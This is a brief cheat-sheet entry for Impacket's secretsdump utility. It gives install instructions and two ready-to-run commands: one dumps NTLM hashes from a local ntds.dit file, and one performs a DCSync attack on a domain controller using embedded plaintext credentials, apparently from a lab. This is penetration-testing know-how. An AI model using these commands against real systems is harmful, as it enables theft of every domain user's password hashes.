secretsdump

A utility that is part of the Impacket library that can be used to extract password hashes and other secrets from a Windows system.

It does this by interacting with the Security Account Manager (SAM) database on the system and extracting the hashed passwords and other information, such as:

• Password hashes for local accounts

• Kerberos tickets and keys

• LSA Secrets

Install:

python3 -m pip install impacket

Usage:

# Extract NTLM hashes with local files
secretsdump.py -ntds /root/ntds_cracking/ntds.dit -system /root/ntds_cracking/systemhive LOCAL

# DCSync attack and dump the NTLM hashes of all domain users.
secretsdump.py -dc-ip 10.10.10.30 MEGACORP.LOCAL/svc_bes:Sheffield19@10.10.10.30